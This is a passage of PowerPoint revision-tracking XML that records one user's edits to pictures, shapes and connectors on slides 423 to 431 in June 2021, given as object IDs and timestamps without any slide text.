          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:50.487" v="915" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:06.198" v="1032" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:52.255" v="916" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:21.094" v="1036" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:55:30.187" v="1172" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1470109627" sldId="424"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:47:50.499" v="1153"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1470109627" sldId="424"/>
            <ac:spMk id="2" creationId="{B0DB52BB-0D1F-4CD4-B402-02E727E4AAA3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3519466523" sldId="424"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="2" creationId="{1E28D788-EB65-442E-BF8E-6E21E71F477D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="3" creationId="{B8989B4C-0DBB-4A73-B84F-191C4CC27DB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="5" creationId="{14BB801E-0FF6-43E1-A10B-194BA3481A6B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:05:19.123" v="1190" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:picMk id="4" creationId="{3AF00A42-DD89-471A-8241-2180DBBAB4C4}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2940456927" sldId="425"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="2" creationId="{06677C6F-6A17-41B9-9454-20C2E6C55EA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="3" creationId="{D17A6442-D3BC-4F64-9331-475A35BB4A8D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="5" creationId="{1684FDA3-5034-4A7C-B76D-BB309E523042}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:09:04.436" v="1257" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:picMk id="4" creationId="{A5593BA6-07CA-403C-86E6-BDE18378DE28}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3876190788" sldId="426"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="2" creationId="{EB4E78CA-DE93-49BF-9D11-4EA9A654062C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="3" creationId="{13D8ED4D-E9C0-44E0-AB71-F20C64EF6C17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="5" creationId="{BBB533FB-1947-490F-87C2-AD866096C002}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:11:01.298" v="1287" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:picMk id="4" creationId="{3A107650-4446-4602-9FDD-75C01AC6A063}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:12:15.231" v="1756"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2709397411" sldId="427"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:10:02.849" v="1754" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="2" creationId="{92013E93-DB90-492A-B250-3D654DE4F4A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="3" creationId="{5A9CBC47-5281-42C1-A152-5F706863C0E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="5" creationId="{769141F6-EC35-4CD8-978C-D4EDCDBBDBE0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:23:04.133" v="1351" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:picMk id="4" creationId="{BE4CED26-C59D-47B3-9EA1-983AA7F15614}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:23:06.499" v="1352" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:picMk id="6" creationId="{E95EF2DC-8971-4687-9975-100E993AE56C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="647302650" sldId="428"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="2" creationId="{4F401151-1B5F-4DB3-A0F6-58B96ACD3D4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="3" creationId="{827EFDD1-A4EC-4153-BCBF-629B5495FFD6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="5" creationId="{E2DD6ECE-65E8-41A3-AF57-49DFAF9BF3CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:26:54.201" v="1371" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:picMk id="4" creationId="{64514D24-E2E1-4CA1-B9D1-9A443420AD45}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="878272104" sldId="429"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="2" creationId="{AAEA0374-E6C7-4341-839D-8B02B7028CCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="3" creationId="{AF8606E7-8F32-4DFE-8870-EE208E0465D7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="5" creationId="{57A321DF-9E2B-481A-A02B-FCB9BCCAC1DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:30:41.039" v="1379" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:picMk id="4" creationId="{726E208B-FDF0-4619-8C04-9F2AEF8CBE06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4091828154" sldId="430"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:32:34.009" v="1381" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="2" creationId="{64A2FC9C-D79A-4E84-81B9-7BDFBFAD51E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="2" creationId="{C718D799-5206-49C6-B128-2EB815ED4890}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="3" creationId="{3AC1CD3D-AC7C-499E-BEEB-50CDA16C2596}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:32:34.009" v="1381" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="3" creationId="{61AB3DAF-0718-4954-9283-5CC778DB5425}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="4" creationId="{4231C78D-78A1-49DC-B782-F890DF224CF4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="5" creationId="{937769A2-786F-4446-868A-072996D19B37}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="6" creationId="{743E2930-08C6-44E5-A0D0-65D0420E2C0B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="7" creationId="{884E09AA-5D92-4777-86E9-8B970559F012}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:23:44.642" v="2091" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="593614233" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="2" creationId="{842B4D4D-D8F2-443F-B950-76086D1792E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:35:14.483" v="1401" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="2" creationId="{E3E1B45E-6C90-4939-A2E7-A9D2E99E24BC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:35:14.483" v="1401" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="3" creationId="{55822484-AA94-4473-BB65-1970D034B51D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="3" creationId="{8C34FF95-E85C-4D45-AA43-58AB747BA2E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="4" creationId="{4BE4D6EB-8B42-4167-9B41-B77F0C7A20B2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:23:44.642" v="2091" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="5" creationId="{AA7D2DDE-BF6D-459D-9188-84B17B477993}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="6" creationId="{4764D631-D86F-4040-959B-A21D41364909}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="593614233" sldId="431"/>
            <ac:spMk id="7" creationId="{55F802E8-C085-467F-9FF3-7447616C9C23}"/>
